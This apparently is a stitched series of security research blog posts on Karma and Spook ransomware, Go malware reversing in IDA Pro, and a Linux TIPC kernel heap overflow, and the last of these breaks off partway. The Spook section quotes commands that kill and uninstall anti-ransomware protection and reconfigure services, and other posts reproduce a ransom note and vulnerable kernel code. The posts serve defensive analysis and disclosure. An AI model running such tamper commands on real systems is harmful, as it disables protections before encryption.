In this post, we’ve looked at a variety of different encryption techniques used by macOS malware and how we can tackle these challenges both statically and dynamically. If you haven’t checked out the previous posts in this series, have a look at Part 1 and Part 2. I hope you’ll join us for the next post in this series as we continue to look at common challenges facing macOS malware researchers.

Karma Ransomware | An Emerging Threat With A Hint of Nemty Pedigree

18 October 2021 at 16:43

Karma is a relatively new ransomware threat actor, having first been observed in June of 2021. The group has targeted numerous organizations across different industries. Reports of a group with the same name from 2016 are not related to the actors currently using the name. An initial technical analysis of a single sample related to Karma was published by researchers from Cyble in August.

In this post, we take a deeper dive, focusing on the evolution of Karma through multiple versions of the malware appearing through June 2021. In addition, we explore the links between Karma and other well known malware families such as NEMTY and JSWorm and offer an expanded list of technical indicators for threat hunters and defenders.

Initial Sample Analysis

Karma’s development has been fairly rapid and regular with updated variants and improvements, oftentimes building multiple versions on the same day. The first few Karma samples our team observed were:

Sample 1: d9ede4f71e26f4ccd1cb96ae9e7a4f625f8b97c9
Sample 2: a9367f36c1d2d0eb179fd27814a7ab2deba70197
Sample 3: 9c733872f22c79b35c0e12fa93509d0326c3ec7f

Sample 1 was compiled on June 18th, 2021, and Samples 2 and 3 the following day on the 19th, a few minutes apart. The basic configuration of these samples is similar, though there are some slight differences, such as PDB paths.

After Sample 1, we see more of the core features appear, including the writing of the ransom note. Upon execution, these payloads would enumerate all local drives (A to Z) and encrypt files where possible.

Further hunting revealed a number of other related samples all compiled within a few days of each other. The following table illustrates compilation timestamps and payload size across versions of Karma compiled in a single week. Note how the payload size decreases as the authors iterate.

Ransom Note is not Created in Sample 1.

Also, the list of excluded extensions is somewhat larger in Sample 1 than in both Samples 2 and 3, and the list of extensions is further reduced from Sample 5 onwards to only exclude “.exe”, “.ini”, “.dll”, “.url” and “.lnk”.

The list of excluded extensions is reduced as the malware authors iterate
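The exclusion check itself amounts to a few lines of logic. This is a sketch of the behaviour described above, not Karma’s actual code:

```python
import os

# The exclusion list as reduced from Sample 5 onwards
EXCLUDED = {".exe", ".ini", ".dll", ".url", ".lnk"}

def should_encrypt(path):
    """Skip files whose extensions would break the OS or the ransomware itself."""
    return os.path.splitext(path)[1].lower() not in EXCLUDED
```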

Encryption Details

From Sample 2 onwards, the malware calls CreateIoCompletionPort, which is used for communication between the main thread and the sub-thread(s) handling the encryption process. This specific call is key to managing the efficiency of the encryption process (parallelization in this case).

Individual files are encrypted by way of a random Chacha20 key. Once files are encrypted, the malware will encrypt the random Chacha20 key with the public ECC key and embed it in the encrypted file.

Chacha Encryption
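Structurally, this is a standard hybrid scheme. The sketch below is purely illustrative: XOR stands in for both ChaCha20 and the ECC key wrap, which also means the “public” and “private” keys coincide here, unlike with real ECC:

```python
import os

KEY_LEN = 32

def xor_stream(data, key):
    # Placeholder cipher standing in for ChaCha20 / the ECC key wrap
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def encrypt_file(plaintext, public_key):
    file_key = os.urandom(KEY_LEN)                   # random per-file key (ChaCha20 in Karma)
    ciphertext = xor_stream(plaintext, file_key)     # encrypt the file contents
    wrapped_key = xor_stream(file_key, public_key)   # wrap the key with the public key (ECC in Karma)
    return ciphertext + wrapped_key                  # embed the wrapped key in the encrypted file

def decrypt_file(blob, private_key):
    ciphertext, wrapped_key = blob[:-KEY_LEN], blob[-KEY_LEN:]
    file_key = xor_stream(wrapped_key, private_key)  # only the key holder can unwrap
    return xor_stream(ciphertext, file_key)
```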

Across Samples 2 to 5, the author removed the CreateIoCompletionPort call, instead opting to create a new thread to manage enumeration and encryption per drive. We also note the “KARMA” mutex created to prevent the malware from running more than once. Ransom note names have also been updated to “KARMA-ENCRYPTED.txt”.

Diving in deeper, some samples show that the ChaCha20 algorithm has been swapped out for Salsa20. The asymmetric algorithm (for ECC) has been swapped from Secp256k1 to Sect233r1. Some updates around execution began to appear during this time as well, such as support for command line parameters.

A few changes were noted in Samples 6 and 7. The main difference is the newly included background image. The file “background.jpg” is written to %TEMP% and set as the Desktop image/wallpaper for the logged-in user.

Desktop image change and message

Malware Similarity Analysis

From our analysis, we see similarities between JSWorm and the associated permutations of that ransomware family such as NEMTY, Nefilim, and GangBang. Specifically, the Karma code analyzed bears close similarity to the GangBang or Milihpen variants that appeared around January 2021.

Some high-level similarities are visible in the configurations.

We can see deeper relationships when we conduct a bindiff on Karma and GangBang samples. The following image shows how similar the main() functions are:

The main() function & argument processing in Gangbang (left) and Karma

Victim Communication

The main body of the ransom note text hasn’t changed since the first sample and still contains mistakes. The ransom notes are base64-encoded in the binary and dropped on the victim machine with the filename “KARMA-AGREE.txt” or, in later samples, “KARMA-ENCRYPTED.txt”.

Your network has been breached by Karma ransomware group.
We have extracted valuable or sensitive data from your network and encrypted the data on your systems.
Decryption is only possible with a private key that only we posses.
Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise.
Scamming is just bad for business in this line of work.
Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded.
We advise you not to use any data recovery tools without leaving copies of the initial encrypted file.
You are risking irreversibly damaging the file by doing this.
If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website.

If a ransom is payed we will provide the decryption key and proof that we deleted you data.
When you contact us we will provide you proof that we can decrypt your files and that we have downloaded your data.

How to contact us:

{[email protected]}
{[email protected]}
{[email protected]}

Each sample observed offers three contact emails, one for each of the mail providers onionmail, tutanota, and protonmail. In each sample, the contact emails are unique, suggesting they are specific communication channels per victim. The notes contain no other unique ID or victim identifier as sometimes seen in notes used by other ransomware groups.

In common with other operators, however, the Karma ransom demand threatens to leak victim data if the victim does not pay. The address of a common leaks site where the data will be published is also given in the note. This website page appears to have been authored in May 2021 using WordPress.

The Karma Ransomware Group’s Onion Page


Karma is a young and hungry ransomware operation. They are aggressive in their targeting, and show no reluctance in following through with their threats. The apparent similarities to the JSWorm family are also highly notable as it could be an indicator of the group being more than they appear. The rapid iteration over recent months suggests the actor is investing in development and aims to be around for the foreseeable future. SentinelLabs continues to follow and analyze the development of Karma ransomware.

Indicators of Compromise

Karma Ransomware

Sample 1: d9ede4f71e26f4ccd1cb96ae9e7a4f625f8b97c9
Sample 2: a9367f36c1d2d0eb179fd27814a7ab2deba70197
Sample 3: 9c733872f22c79b35c0e12fa93509d0326c3ec7f
Sample 4: c4cd4da94a2a1130c0b9b1bf05552e06312fbd14
Sample 5: bb088c5bcd5001554d28442bbdb144b90b163cc5
Sample 6: 5ff1cd5b07e6c78ed7311b9c43ffaa589208c60b
Sample 7: 08f1ef785d59b4822811efbc06a94df16b72fea3
Sample 8: b396affd40f38c5be6ec2fc18550bbfc913fc7ea

Gangbang Sample 

Karma Desktop image

Victim Blog (TOR)

Ransom Note Email Addresses
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

MITRE ATT&CK

T1485 Data Destruction
T1486 Data Encrypted for Impact
T1012 Query Registry
T1082 System Information Discovery
T1120 Peripheral Device Discovery
T1204 User Execution
T1204.002 User Execution: Malicious File

AlphaGolang | A Step-by-Step Go Malware Reversing Methodology for IDA Pro

21 October 2021 at 14:12

The increasing popularity of Go as a language for malware development is forcing more reverse engineers to come to terms with the perceived difficulties of analyzing these gargantuan binaries. The language offers great benefits for malware developers: portability of statically-linked dependencies, speed of simple concurrency, and ease of cross-compilation. On the other hand, for analysts, it’s meant learning the inadequacies of our tooling and contending with a foreign programming paradigm. While our tooling has generally improved, the perception that Go binaries are difficult to analyze remains. In an attempt to further dispel that myth, we’ve set out to share a series of scripts that simplify the task of analyzing Go binaries using IDA Pro with a friendly methodology. Our hope is that members of the community will feel inspired to share additional resources to bolster our collective analysis powers.

A Quick Intro to the Woes of Go Binary Analysis

Go binaries present multiple peculiarities that make our lives a little harder. The most obvious is their size. Due to the approach of statically-linking dependencies, the simplest Go binary is multiple megabytes in size, and one with proper functionality can easily reach the 15-20MB range. The binaries are then easily stripped of debug symbols and can be UPX packed to mask their size quite effectively. That bulky size entails a maze of standard code that leads reverse engineers down long unproductive rabbit holes, steering them away from the sparse user-generated code that implements the actual functionality.

Hello World source code
Mach-o binary == 2.0mb
UPX compressed == 1.1mb

To make things worse, Go doesn’t null-terminate strings. The linker places strings in incremental order of length and functions load these strings with a reference to a fixed length. That’s a much safer implementation but it means that even a cursory glance at a Go binary means dealing with giant blobs of unrelated strings.

“Hello World!” string lost in a sea of unrelated strings.

Even the better disassemblers and decompilers tend to display these unparsed string blobs confusing their intended purpose.

Autoanalysis output

Manually fixed disassembly

That’s without getting into the complexities of recovering structures, accurately portraying function types, interfaces, and channels, or properly tracing argument references.

The issue of arguments should prove disturbing for our dynamic analyst friends who were hoping that a debugger would spare them the trouble of manual analysis. While a debugger certainly helps determine arguments at runtime, it’s important to understand how indirect that runtime is. Go is peculiar in allocating a runtime stack owned by the caller function that will in turn handle arguments and allow for multiple return values. For us it translates into a mess of runtime function prologues before any meaningful functionality. Good luck navigating that without symbols.

Improving the Go Reversing Experience

With all those inadvertent obstacles in mind, it’s perfectly understandable that reversers dreaded analyzing Go binaries. However, the situation has changed in the past few years and we should reassess our collective abhorrence of Go malware. Different disassemblers and decompilers have stepped up their Go support. BinaryNinja and Cerbero have improved their native support for Go and there are now standalone frameworks like GoRE that offer good functionality depending on the Go compiler version and can even help support other projects like radare2.

We’ll be focusing on IDA Pro. With the advent of version 7.6, IDA’s native support of Go binaries is drastically better and we’ll be building features on top of this. For folks stuck on v7.5 or lower, we’ll also provide some help by way of scripts but the full functionality of AlphaGolang is unlocked with 7.6 due to some missing APIs (specifically the ida_dirtree API for the new folder tree view). This isn’t the first time brave souls in the community have attempted to improve the Go reversing experience for IDA. However, those projects were largely monolithic labors of love by their original authors and given the fickle nature of IDA’s APIs, once those authors got busy, the scripts fell into disrepair. We hope to improve that as well.


With AlphaGolang, we wanted to tackle two disparate problems simultaneously– the brittleness of IDApython scripts for Go reversing and the need for clear steps to analyze these binaries.

We can’t expect everyone to be an expert in Go in order to understand their way around a binary. Less so to have to fix the tooling they’re attempting to rely on. While engineers might be tempted to address the former by elaborating a complex framework, we figured we’d swing in the opposite direction and break up the requisite functionality into smaller scripts. Those smaller digestible scripts allow us to part out a relatable methodology in steps so that analysts can pick and choose what they need as they advance in their reversing journey.

Additionally, we hope the simplicity of the project and a forthrightness about its current limitations will inspire others to contribute new steps, fixes, and additional functionality.

At this time, the first five steps are as follows–

Step 0: Identifying Go Binaries

Go Build ID Regex

By popular request, we are including a simple YARA rule to help identify Go binaries. This is a quick and scrappy solution that checks for PE, ELF, and Mach-O file headers along with a regex for a single Go Build ID string.
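A rough Python equivalent of that check, matching an executable header plus the Build ID marker that Go embeds near the start of a binary, might look like the following (the regex bounds and magic list are approximations, not the published rule):

```python
import re

# Go embeds a marker of the form: Go build ID: "<id>"
GO_BUILD_ID = re.compile(rb'Go build ID: "[^"\x00]{20,120}"')

# PE, ELF and (a subset of) Mach-O magic bytes
EXE_MAGICS = (b"MZ", b"\x7fELF", b"\xcf\xfa\xed\xfe", b"\xca\xfe\xba\xbe")

def looks_like_go(data):
    return data.startswith(EXE_MAGICS) and GO_BUILD_ID.search(data) is not None
```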

Step 1: Recreate pcln Table

Recreating the Go pcln table

Dealing with stripped Golang binaries is particularly awful. Reversers unfamiliar with Go are disheartened to see that despite having all of the original function names within the binary, their disassembler is unable to connect those symbols as labels for their functions. While that might seem like a grand coup for malware developers attempting to confuse and frustrate analysts, it isn’t more than a temporary inconvenience. Despite being stripped, we have enough information available to reconstruct the Go pcln table and provide the disassembler with the information it needs.

Two noteworthy points before continuing:

  • The pcln table is documented as early as Go v1.12 and has been modified as of v1.16.
  • IDA Pro v7.6+ handles Go binaries very well and is unlikely to need this step. This script will prove particularly valuable for folks using IDA v7.5 and under when dealing with stripped Go binaries.

Depending on the file’s endianness, the script will locate the pcln table’s magic header, walk the table converting the data to DWORDs (or QWORDs depending on the bitness), and create a new segment with the appropriate ‘.gopclntab’ header effectively undoing the stripping process.
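The header scan at the heart of that step can be sketched in a few lines. This is a simplification assuming the two pre-1.18 magic values; the real script then walks the table and builds the segment:

```python
import struct

# pclntab magics: 0xFFFFFFFB (Go 1.2-1.15), 0xFFFFFFFA (Go 1.16/1.17)
PCLN_MAGICS = {0xFFFFFFFB, 0xFFFFFFFA}

def find_pclntab(data):
    """Return (offset, endianness) candidates for the pclntab header."""
    hits = []
    for off in range(len(data) - 7):
        for endian in ("<", ">"):
            (magic,) = struct.unpack_from(endian + "I", data, off)
            # Header layout: magic, two zero bytes, pc quantum (1/2/4), pointer size (4/8)
            if (magic in PCLN_MAGICS and data[off + 4] == data[off + 5] == 0
                    and data[off + 6] in (1, 2, 4) and data[off + 7] in (4, 8)):
                hits.append((off, "little" if endian == "<" else "big"))
    return hits
```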

Step 2: Discover Missing Functions and Restore Function Names

Function discovery and renaming

Immediately after recreating the pcln table (or in unfortunate cases where automatic disassembly fails), function names are not automatically assigned and many functions may have eluded discovery. We are going to fix both of these issues in one simple go.

We know that the pcln table is pointing us at every function in the binary, even if IDA hasn’t recognized them. This script will walk the pcln table, check the offsets therein for an existing function, and instruct IDA to define a function wherever one is missing. The resulting number of functions can be drastically greater even in cases where disassembly seems perfect.

Additionally, we’ll borrow Tim Strazzere’s magic from the original Golang Loader Assist in order to label all of our functions. We ported the plugin to Python 3, made it compatible with the new IDA APIs, and refactored it. The functionality is now part of two separate steps (2 and 4) and easier to maintain. In this step, Strazzere’s magic will help us associate all of our functions with their original names in an IDA friendly format.

Step 3: Surface User-Generated Functions

Automatically categorizing functions

Having recovered and labeled all of our functions, we are now faced with the daunting proposition of sifting through thousands of functions. Most of these functions are part of Go’s standard packages or perhaps functionality imported from GitHub repositories. To belabor a metaphor, we now have street signs but no map. How do we fix this?

IDA v7.5 introduced the concept of Folder Views, an easily missed Godsend for the anal-retentive reverser. This feature has to be explicitly turned on via a right-click on the desired subview –whether functions, structures, imports, etc. IDA v7.6 takes this a step further by introducing a thus-far undocumented API to interact with these folder views (A heartfelt thank you to Milan Bohacek for his help in effectively wielding this API). That should enable us to automate some extraordinary time-saving functionality.

While our malware may have 5,000 functions, the majority of those functions were not written by the malware developers, they’re publicly documented, and we need nothing more than a nominal overview to know what they do.

NOBELIUM GoldMax (a.k.a. SunShuttle)

By being clever about categorizing function packages, we can actually whittle down to a fraction of the overall functions that merit analyst time. Functions will be categorized by their package prefixes and further grouped as ‘Standard Go Packages’, unlabeled (‘sub_’), uncategorized (no package prefix), and Github imports. What remains are the ‘main’ package and any custom packages added by the malware developers. For a notable example, the NOBELIUM GoldMax (a.k.a. SunShuttle) malware can be reduced from a hulking 4,771 functions to a mere 22. This is the simplest and perhaps the most valuable step towards our goal of understanding the malware’s functionality.
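The grouping logic boils down to bucketing each recovered symbol by its package prefix. A simplified sketch follows (the group names and stdlib prefix list here are illustrative, and the real script drives IDA’s folder view rather than returning strings):

```python
# A partial set of standard library top-level package names
STDLIB = {"runtime", "net", "fmt", "os", "crypto", "encoding",
          "strings", "sync", "syscall", "time", "reflect", "internal"}

def categorize(name):
    if name.startswith("sub_"):
        return "Unlabeled"
    if name.startswith("github.com/"):
        return "Github Imports"
    if "." not in name:
        return "Uncategorized"
    pkg = name.split(".", 1)[0]          # e.g. "net/http" from "net/http.(*Client).Get"
    if pkg == "main":
        return "main"
    if pkg.split("/", 1)[0] in STDLIB:
        return "Standard Go Packages"
    return pkg                           # a custom package added by the developers
```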

Step 4: Fix String References

Accurately recasting strings by reference

Finally, there’s the issue of strings in Go. Unlike all C-derivative languages, strings in Go are not null terminated. Neither are they grouped together based on their source or functionality. Rather, the linker places all of the strings in order of incremental length, with no obvious demarcation as to where one string ends and the next begins. This works because whenever a function references a string, it does so by loading the string address and a hardcoded length. While this is a safer paradigm for handling strings, it makes for an unpleasant reversing experience.
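The (address, length) referencing scheme is easy to demonstrate with a mocked-up blob (the strings and offsets below are illustrative):

```python
# The linker lays strings out back to back, in increasing order of length,
# with no terminators between them
BLOB = b"HiGoByeHelloHello World!"

def string_at(blob, offset, length):
    """Resolve a reference that loads a string address plus a hardcoded length."""
    return blob[offset:offset + length].decode()
```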

So how do we overcome this hurdle? Here’s where another piece of Strazzere’s Golang Loader Assist can help us. His original plugin would check functions for certain string loading patterns and use these as a guide to fix the string assignments. We have once again (partially) refactored this functionality and made it compatible with Python 3 and IDA’s new APIs. We have also improved some of the logic for fixing string blobs in place (flagged either by suspicious length or because a reference points into the middle of a blob) and added some sanity checks.

While this step is already a marked improvement, we are seeing new string loading patterns introduced with Go v1.17 that need adding and there’s definitely room for improved refactoring. We hope some of you will feel inclined to contribute.

Where Do We Go From Here?

Let’s take a step back and look at where we are after all of these steps. We have an IDB with all functions discovered, labeled, and categorized, and hopefully all of their string references are correctly annotated. This is an ideal we could seldom dream of with malware of a comparable size written in C or C++ without extensive analysis time and prior expertise.

Now that we have a clear view of the user-generated functionality, what more can we do? How else can we improve our hunting and analysis efforts?

The following are a series of ideas we’d recommend implementing in further steps–

  • How about auto-generating YARA rules for user-generated functions and their referred strings?
  • Want a better understanding of arguments as they’re passed between functions? How about automagically setting breakpoints at the runtime stack prologues and annotating the arguments back to our IDB?
  • For reversers that follow the Kwiatkowski school of rewriting the code to understand the program’s functionality, how about selectively exporting the Hex-Rays pseudocode solely for the user-generated functions?
  • How about reconstructing interfaces and type structs from runtime objects?

Got more ideas? Want to help? Head to our SentinelLabs GitHub repo for all of the scripts and contribute your own shortcuts and superpowers for analyzing Go malware!

We’d like to thank the following for their direct and indirect contributions– 

  • Tim Strazzere for his original Golang Loader Assist script, which we refactored and made compatible with Python3 and the new IDA APIs. 
  • Milan Bohacek (Avast Software s.r.o.) for his invaluable help figuring out the ida_dirtree API.
  • Joakim Kennedy (Intezer)
  • Ivan Kwiatkowski (Kaspersky GReAT) for making his Go reversing course available.
  • Igor Kuznetsov (Kaspersky GReAT) for his help understanding newer pcln tab versions.


Guides and Documentation



Spook Ransomware | Prometheus Derivative Names Those That Pay, Shames Those That Don’t

28 October 2021 at 16:12

By Jim Walter and Niranjan Jayanand

Executive Summary

  • Spook Ransomware is an emerging player first seen in late September 2021
  • The operators publish details of all victims regardless of whether they pay or not
  • Targets range across several industries with an emphasis on manufacturing
  • Analysis shows a significant degree of code sharing between Spook and the Prometheus and Thanos ransomware families


Spook ransomware emerged onto the scene in late September 2021 and follows the multi-pronged extortion model that is all too common these days. Victims are hit with the threat of data destruction as well as public data leakage and the associated fallout. In this report, we explore how the malware shares certain similarities with earlier ransomware families, and describe its main encryption and execution behaviour.

Spook and Prometheus

There is some indication that Spook is either linked to, or derived from, Prometheus ransomware. Prometheus is itself an evolution of Thanos ransomware. However, it is important to note that since Thanos ransomware had a builder which was leaked, any real attempts at attribution based solely on the malware’s code is somewhat futile. Even so, there are a few notable similarities between Spook, Prometheus, and ultimately Thanos.

The .NET binary in the following sample, first seen in VirusTotal on 02 October, provides a glimpse into some of these similarities, with artifacts from the Thanos builder also apparent.

Shared code block with Thanos

Our analysis suggests an overlap of between 29% and 50% of shared code between Spook and Prometheus. Some of this overlap is related to construction of the ransom notes and key identifiers.

Ransom note similarity example (Prometheus vs Spook)

In addition to shared code artifacts, there are similarities with regards to the layout and structure of the Spook and Prometheus payment portals.

Below are the similarities between the data leak URLs hosted by both groups:

  • Spook ransomware:
  • Prometheus ransomware:

Offline Encryption and Process Manipulation

Spook, mirroring the manifestos of others, boasts “very strong (AES) encryption” along with the threat of leaking victim data to the public. The malware has the ability to encrypt target machines without requiring internet connectivity. Encryption of a full disk can occur within just a few minutes, at which point the ransom note is displayed on the desktop (RESTORE_FILES_INFO.HTA) along with numerous other system notifications.

The malware also makes a number of changes to ensure that the ransom notifications are displayed prominently after reboot (via Start Menu lnk, Reg).

WinLogon is modified (via registry) to display the Ransom Note text upon login:

	HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon
	Str Value: LegalNoticeCaption/Text

Registry Modifications for Persistence
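These Winlogon values are easy to audit. The heuristic below is an illustrative sketch (not SentinelOne detection logic); `values` stands in for data you would read from the Winlogon key via `winreg` on a live Windows host:

```python
# Hedged hunting heuristic: flag Winlogon LegalNoticeCaption/LegalNoticeText
# values that look like ransom notes. Marker keywords are illustrative.

RANSOM_MARKERS = ("encrypted", "restore_files", "bitcoin", "decrypt")

def suspicious_legal_notice(values):
    """Return True if the legal notice values contain ransom-note keywords."""
    for name in ("LegalNoticeCaption", "LegalNoticeText"):
        text = (values.get(name) or "").lower()
        if any(marker in text for marker in RANSOM_MARKERS):
            return True
    return False

print(suspicious_legal_notice({
    "LegalNoticeCaption": "ALL YOUR FILES ARE ENCRYPTED",
    "LegalNoticeText": "See RESTORE_FILES_INFO.HTA",
}))  # → True
print(suspicious_legal_notice({"LegalNoticeCaption": "Authorized use only"}))  # → False
```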

Ransom notes are also displayed upon login via a Shortcut placed in the Startup directory

Startup Folder Shortcut

In addition, Spook will attempt to terminate processes and stop services of anything that may inhibit the encryption process.

Here again there is overlap between Spook, Prometheus, and Thanos in process discovery and manipulation, especially in checking for and killing the Raccine anti-ransomware process that some organizations deploy in an effort to protect shadow copies.

TASKKILL.EXE is used to force the termination of the following processes if found:

	taskkill.exe /IM ocomm.exe /F

The Raccine product is specifically targeted, with the malware disabling the product’s UI components and update features. These actions are carried out via basic OS commands such as reg.exe and schtasks.exe.

	taskkill.exe /F /IM RaccineSettings.exe
	reg.exe (CLI interpreter) delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
	reg.exe (CLI interpreter) delete HKCU\Software\Raccine /F
	schtasks.exe (CLI interpreter) /DELETE /TN "Raccine Rules Updater" /F
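These tampering commands are distinctive enough to hunt on. The sketch below (illustrative, deliberately loose matching; not SentinelOne detection logic) flags command lines that mirror the Raccine-tampering behavior above:

```python
# Hedged sketch: flag command lines matching Spook's Raccine-tampering
# behavior. Patterns mirror the reg.exe/schtasks.exe/taskkill.exe commands.

TAMPER_PATTERNS = (
    ("taskkill", "raccinesettings.exe"),
    ("reg", "raccine tray"),
    ("reg", "software\\raccine"),
    ("schtasks", "raccine rules updater"),
)

def is_raccine_tampering(cmdline):
    """Return True if a command line pairs a known tool with a Raccine target."""
    c = cmdline.lower()
    return any(tool in c and needle in c for tool, needle in TAMPER_PATTERNS)

print(is_raccine_tampering("taskkill.exe /F /IM RaccineSettings.exe"))  # → True
print(is_raccine_tampering("schtasks.exe /QUERY"))                      # → False
```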

In addition, sc.exe is used to reconfigure specific services and components, disabling some and setting others to start automatically:

	sc.exe config Dnscache start= auto
	sc.exe config SQLTELEMETRY start= disabled
	sc.exe config FDResPub start= auto
	sc.exe config SSDPSRV start= auto
	sc.exe config SQLTELEMETRY$ECWDB2 start= disabled
	sc.exe config SstpSvc start= disabled
	sc.exe config upnphost start= auto
	sc.exe config SQLWriter start= disabled

With various processes out of the way and the system in an optimal state for encryption, the malware proceeds to enumerate local files and folders, along with accessible network resources.

Given the Thanos pedigree, specifics around encryption can vary. The samples analyzed employ a random string at runtime as the passphrase for file encryption (AES). The string is subsequently encrypted with the attacker’s public key and added into the generated ransom note(s). Recovery of encrypted data is, therefore, not possible without the corresponding private key.
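The key flow described above can be sketched schematically. This is not Spook's code: XOR stands in for both AES and the public-key step purely to keep the sketch dependency-free, so only the structure of the scheme is illustrated:

```python
# Schematic of the hybrid key flow (NOT Spook's implementation): a random
# per-run passphrase encrypts files, and only a copy of that passphrase
# encrypted under the attacker's public key lands in the ransom note.

import hashlib
import os

def xor_bytes(data, key):
    """Toy symmetric cipher standing in for AES (and the public-key step)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

passphrase = os.urandom(16)                     # random string chosen at runtime
file_key = hashlib.sha256(passphrase).digest()  # derive the file-encryption key

plaintext = b"quarterly_report.xlsx contents"
ciphertext = xor_bytes(plaintext, file_key)     # stand-in for AES file encryption

attacker_pub = hashlib.sha256(b"attacker-public-key").digest()
note_blob = xor_bytes(passphrase, attacker_pub)  # stand-in for encrypting the
                                                 # passphrase into the note

# Without the passphrase (i.e. without the attacker's private key), files stay
# opaque; with it, decryption is symmetric:
print("recovered:", xor_bytes(ciphertext, file_key) == plaintext)  # → recovered: True
```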

Ransom Payment and Victimology

Upon infection, victims are instructed to proceed to Spook’s TOR-based payment portal.

Spook Ransom Demand

At the payment portal, the victim is able to interact with the attackers via chat to negotiate payment.

Spook Payment Portal

Spook has been leveraging attacks against high-value targets across the globe, with little to no discretion with regards to industry. Looking at the current cross-section of victims posted on the group’s web site, however, the majority are in the manufacturing sector.

The public blog went live in early October 2021. At the time of writing, there are 17 victims posted on the Spook site.

Some of the victims named on the Spook blog site

Spook actually lists all attacked companies, regardless of whether or not they pay the ransom demand. Those victims that pay have their entry updated to indicate that the company’s data is ‘not for sale’. Those that have not paid are listed as having data that is “For Sale”, while some victim entries, presumably the most recent or those that are in the process of negotiating, are listed as “Company Decides”.


As these attacks continue to escalate and become more egregious, the need for true attack prevention is all the more critical. Spook’s tactic of publicly outing victims threatens reputational harm to any compromised company, even if they follow the attackers’ payment demands.

This only continues to illustrate the importance of preventing attacks in the first place. Ransomware operators have moved beyond worrying about companies detecting attacks after the fact and attempting to recover encrypted data.

Indicators of Compromise



TA0005 – Defense Evasion
T1486 – Data Encrypted for Impact
T1027.002 – Obfuscated Files or Information: Software Packing
T1007 – System Service Discovery
T1059 – Command and Scripting Interpreter
T1112 – Modify Registry
TA0010 – Exfiltration
T1018 – Remote System Discovery
T1082 – System Information Discovery
T1547.004 – Boot or Logon Autostart Execution: Winlogon Helper DLL
T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Spook Ransom Note Sample

CVE-2021-43267: Remote Linux Kernel Heap Overflow | TIPC Module Allows Arbitrary Code Execution

4 November 2021 at 10:57

Executive Summary

  • SentinelLabs has discovered a heap overflow vulnerability in the TIPC module of the Linux Kernel.
  • The vulnerability can be exploited either locally or remotely within a network to gain kernel privileges, allowing an attacker to compromise the entire system.
  • The TIPC module comes with all major Linux distributions but needs to be loaded in order to enable the protocol.
  • A patch was released on the 29th of October; the vulnerability affects kernel versions between 5.10 and 5.15.
  • At this time, SentinelOne has not identified evidence of in-the-wild abuse.

Introduction and Methodology

As a researcher, it’s important to add new techniques and software to your bug hunting methodology. A year ago, I started using CodeQL for my own research on open source projects and decided to compile the Linux kernel with it and try my luck.

For those who haven’t come across it before, CodeQL is an analysis engine that allows you to run queries on code. From a security perspective, this can allow you to find vulnerabilities purely by describing what they look like. CodeQL will then go off and find all instances of that vulnerability.

I’d had a passing thought about overflows that I wanted to take a quick look at between research projects: namely, looking at locations in which a 16-bit variable was passed to kmalloc. My thinking was that 16 bits would be easier to realistically overflow than a 32-bit or 64-bit value.

The query itself is basic and isn’t aimed at finding actual overflows, just looking for interesting kmalloc calls as a starting point for a larger query:

import cpp

from FunctionCall fc // Select all Function Calls
where fc.getTarget().getName() = "kmalloc" // Where the target function is called kmalloc
and fc.getArgument(0).getType().getSize() = 2 // and the supplied size argument is a 16-bit int
select fc, fc.getLocation() // Select the call location and the string of the location to know what file it’s in

This returned 60 results. After briefly looking over a few, one result stood out above the rest:

static bool tipc_crypto_key_rcv(struct tipc_crypto *rx, struct tipc_msg *hdr) // (1)
{
	struct tipc_crypto *tx = tipc_net(rx->net)->crypto_tx;
	struct tipc_aead_key *skey = NULL;
	u16 key_gen = msg_key_gen(hdr);
	u16 size = msg_data_sz(hdr);                                               // (2)
	u8 *data = msg_data(hdr);

/* ... */
	/* Allocate memory for the key */
	skey = kmalloc(size, GFP_ATOMIC);                                          // (3)
	if (unlikely(!skey)) {
		pr_err("%s: unable to allocate memory for skey\n", rx->name);
		goto exit;
	}

	/* Copy key from msg data */
	skey->keylen = ntohl(*((__be32 *)(data + TIPC_AEAD_ALG_NAME)));           // (4)
	memcpy(skey->alg_name, data, TIPC_AEAD_ALG_NAME);
	memcpy(skey->key, data + TIPC_AEAD_ALG_NAME + sizeof(__be32),
			skey->keylen);                                                    // (5)

	/* Sanity check */
	if (unlikely(size != tipc_aead_key_size(skey))) {                         // (6)
		kfree(skey);
		skey = NULL;
		goto exit;
	}
/* ... */
What struck me as interesting is that this seems to be a function for parsing received data (1) and doesn’t appear to have any validation on the size (4) (5) obtained from the body of the message (2) until after it’s already copied (6). It also appears that the copied size could be different to the allocated size (3). This looked like a clear-cut kernel heap buffer overflow.

What is the Linux TIPC Protocol?

Transparent Inter-Process Communication (TIPC) is a protocol that allows nodes in a cluster to communicate with each other in a way that can optimally handle a large number of nodes remaining fault tolerant.

In order to keep this section brief, this post will focus on the key components. For a more detailed and high-level description of the actual TIPC protocol, including the various ways messaging is performed and how Service Tracking works, it’s best to refer to the official sourceforge page.

The protocol is implemented in a kernel module packaged with all major Linux distributions. When loaded by a user, it can be used as a socket and can be configured on an interface using netlink (or using the userspace tool tipc, which will perform these netlink calls) as an unprivileged user.

TIPC can be configured to operate on top of a bearer protocol such as Ethernet or UDP (in the latter case, the kernel listens on port 6118 for incoming messages from any machine). Since a low privileged user is unable to create raw ethernet frames, setting the bearer to UDP makes it easier to write a local exploit for.

Although TIPC is used on top of these protocols, it has a separate addressing scheme whereby nodes can choose their own addresses.

The TIPC protocol works in a way transparent to the user. All message construction and parsing is performed in the kernel. Each TIPC message has a common header format and some message-specific headers (hence the variable total size of the header).

The most important parts of the common header for this vulnerability are the ‘Header Size’ –the actual header size shifted to the right by two bits– and the ‘Message Size’ –the entire TIPC message taking into account the header size:

An example of a TIPC message header
